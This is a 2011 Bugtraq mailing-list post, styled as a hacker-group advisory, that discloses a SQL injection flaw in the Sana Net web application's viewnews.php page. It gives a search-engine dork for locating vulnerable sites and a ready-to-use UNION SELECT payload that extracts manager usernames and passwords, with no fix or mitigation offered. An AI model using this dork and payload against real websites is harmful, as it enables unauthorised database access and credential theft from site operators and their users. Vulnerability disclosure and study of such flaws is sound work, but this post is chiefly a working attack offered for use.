
Date: Wed, 31 Aug 2011 08:09:20 GMT
From: ehsan_hp200@...mail.com
To: bugtraq@...urityfocus.com
Subject: Sana Net (viewnews.php?id) Remote SQL injection Vulnerability

################################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## Sana Net (viewnews.php?id)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : Ehsan_Hp200@...mail.com
##  
## Vendor : http://www.sana-net.com/
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : "inurl:viewnews.php?id=" "&#1591;&#1585;&#1575;&#1581;&#1610; &#1608; &#1576;&#1585;&#1606;&#1575;&#1605;&#1607; &#1606;&#1608;&#1740;&#1587;&#1740; &#1575;&#1586; &#1588;&#1585;&#1705;&#1578; &#1591;&#1585;&#1575;&#1581;&#1575;&#1606; &#1587;&#1606;&#1575; &#1606;&#1578;"

Exploite:

www.victim.com/viewnews.php?id=-null/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null/**/from/**/manager

#########################################################################################
SpeCial TanX To : Skote_Vahshat
##########################################################################################
###############################  IRANIAN THE BEST HACKERS IN THE WORLD ################## 		  
